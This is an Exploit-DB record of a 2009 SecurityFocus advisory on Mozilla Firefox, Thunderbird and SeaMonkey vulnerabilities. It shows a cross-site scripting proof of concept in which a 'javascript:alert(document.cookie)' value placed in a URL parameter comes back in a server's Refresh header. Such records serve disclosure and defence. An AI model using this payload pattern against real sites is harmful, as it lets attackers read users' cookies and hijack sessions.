Mozilla (Multiple Products) - Server Refresh Header Cross-Site Scripting

EDB-ID:

32942




Platform:

Linux

Date:

2009-04-22


source: https://www.securityfocus.com/bid/34656/info

The Mozilla Foundation has released multiple security advisories specifying various vulnerabilities in Firefox, Thunderbird, and SeaMonkey.

Attackers can exploit these issues to bypass same-origin restrictions, obtain potentially sensitive information, and execute arbitrary script code with elevated privileges; other attacks are also possible. 

With request to script at web site:

http://www.example.com/script.php?param=javascript:alert(document.cookie)

Which returns in answer the refresh header:

refresh: 0; URL=javascript:alert(document.cookie)